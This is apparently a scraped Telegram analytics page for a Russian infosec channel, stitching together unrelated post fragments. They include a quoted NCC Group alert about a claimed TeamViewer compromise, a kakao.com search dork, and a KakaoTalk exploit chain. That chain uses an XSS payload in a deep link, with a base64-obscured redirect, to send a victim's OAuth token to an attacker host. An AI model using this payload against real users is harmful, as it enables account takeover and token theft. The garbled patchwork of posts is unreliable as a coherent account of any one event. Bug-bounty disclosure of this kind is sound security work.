S.E.Reborn
Copyright: @SEAdm1n Вакансии: @infosec_work Информационная безопасность. Литература для ИТ специалистов. Пентест, Хакинг, OSINT, СИ, DevOps, Администрирование. Сотрудничество - @SEAdm1n
Больше- Подписчики
- Просмотры постов
- ER - коэффициент вовлеченности
Загрузка данных...
Загрузка данных...
"The NCC Group Global Threat Intelligence team has been made aware of significant compromise of the TeamViewer remote access and support platform by an APT group. Due to the widespread usage of this software the following alert is being circulated securely to our customers." NCC Group can't disclose the source at the time and keep investigating this. Big source, but no substance. Curious to see how this will work out. ping @[email protected] @screaminggoat
site:*.kakao.com inurl:search -site:developers.kakao.com -site:devtalk.kakao.com2. Отправляем не подозревающему собеседнику ссылку на свой сайт
evil.com
, где должен быть размещен следующий JS-код с XSS:
location.href = kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">
Он откроет вебвью, приложение отправит OAuth-токен на домен из белого списка и выполнит XSS с редиректом и токеном на сайт хакера.
Баг был отправлен в 2023 году, а выплата составила $0
, потому что владельцы приложения выплачивают награды только соотечественникам ¯\_(ツ)_/¯This vector loops through all entities and assigns them to a JavaScript URL and checks if they decode to ASCII characters.
Ваш текущий тарифный план позволяет посмотреть аналитику только 5 каналов. Чтобы получить больше, выберите другой план.